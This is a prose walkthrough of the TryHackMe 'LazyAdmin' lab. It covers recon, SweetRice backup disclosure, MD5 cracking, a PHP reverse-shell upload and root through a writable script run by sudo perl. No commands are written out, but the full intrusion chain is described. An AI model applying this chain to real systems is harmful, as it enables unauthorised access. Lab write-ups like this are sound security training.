LazyAdmin - TryHackMe Writeup
The link for this lab is located here: https://tryhackme.com/room/lazyadmin
Easy linux machine to practice your skills
Full Walkthrough
The first thing to do is run a simple Nmap scan that will scan all ports.
Initially, two ports come back as open - SSH and HTTP. With this information, we can run a more detailed scan on these two ports to try and gather version information and anything else that comes back.
We see that the web page is running Apache httpd 2.4.18 on Ubuntu but no other useful information comes back. A good idea is to visit the web page itself to see what is happening.
For this, it just seems to be the default Apache2 web page. At this point, since there is not likely any website operating on this page, we can try and find any hidden directories using a tool like Feroxbuster.
Immediately, we see a directly titled “content'“ which is not standard and could hold some interesting information.
This looks more like an interesting site. It seems to be running SweetRice which looks like a website management system or a CMS. From here, we can try looking at the source code for anything interesting but there is nothing.
Next, we can try researching and see if an exploit exists for SweetRice. Luckily for us, a ton of exploits come back include a file upload, backup disclosure and code execution.
Looking at the Backup Disclosure vulnerability, we can see that we can access all the MySQL backups from /inc/mysql_backup.
Knowing we need to find the /inc directory, we can run another Feroxbuster scan on the /content directory to see if the /inc directory exists - it does!
Knowing this, we can now access those MySQL backups.
We see there is indeed a SQL backup file that we can download. Once downloaded, we can open it and view the contents.
Looking through the file, we can see what looks like a password hash and a username of potentially admin or manager.
With this hash looking string, we can use hash-identifier to see if it can be identified. In this case, it is identified as MD5.
To crack this hash, we can use a tool like Hashcat with the rockyou.txt wordlist. This luckily cracks this password and we get the cleartext password of Password123.
Clicking through the subdirectories Feroxbuster finds, we stumble onto a login panel located at /content/as/. We can try logging in with the cracked credentials of admin and Password123.
We gain access! We now have access to the backend panel for the website.
In addition, we can see the version running is 1.5.1 - our exploitable version.
Knowing the version, we can try and look at another exploit we found - Arbitrary File Upload. Reading the code, we can see it simply tries to upload a file to somewhere called media centre.
However, instead of running the script, we can simply navigate to Media Center ourselves and upload a file manually.
Reading through the code more, it seems it tries to upload certain file extensions with one of them being .php5 - this indicates .php is probably blocked but .php5 isn’t.
With this information, we can use PentestMonkey’s PHP reverse shell and simply change the extension to .php5.
Once the file is created, we simply upload it and it succeed!
Before executing, we need to start a Netcat listener on your specified port - mine was 8888.
Then, we simply click on the file through the web browser to navigate to it. The browser hangs but we get a reverse connection back.
Just a side note - there is another way of doing this. Reading the code execution vulnerability, we can see that we can add an “ads” file with PHP code.
Navigating to the Ads Admin page and adding PHP code into the Ads code section, we can spawn a reverse shell.
After we save it, we now have a file called rev_shell.php.
Reading the code again, we see we execute it via the /ads directory.
Navigating to that directory does indeed show our revshellphp.php file
Once again, we can click on it and gain a reverse shell.
We have a shell running as www-data. With this, we can navigate to /home/itguy and grab the user.txt flag.
However, inside this folder there is also a text file called mysql_login.txt which is interesting.
Inside, we see some credentials for what can be a MySQL server running somewhere which we don’t have access to - maybe there is credential reuse?
Keeping them in our back pocket, we can check for easy wins by seeing what our SUDO permissions are.
Here, we see that we are able to execute a Perl script inside /home/itguy. We can try and see what it does..
This script seems to simply execute a file - /etc/copy.sh. Once again, we can try reading the contents of this script.
Hmmm…. interesting. This seems to be a Bash one-liner for spawning a reverse shell. It seems to be connecting to 192.168.0.190 on port 5554 - maybe this machine has already been compromised internally.
With access to this script, let’s check what the permissions are.
The permissions indicate that anyone has the ability to read, write or execute this script. Knowing this information - and the fact that this script is execute through Perl as root - we can exploit this to gain a reverse shell back to us.
For this, we can simply change the IP in the current file from 192.168.0.190 to our TryHackMe IP - in my case that is 10.11.3.112.
Then, we start a Netcat listener again on port 5554.
Finally, we can execute that Perl command as sudo to gain a reverse shell connection back to us running as root.
After we gain a root shell, we can finally grab the root.txt flag and finish this room.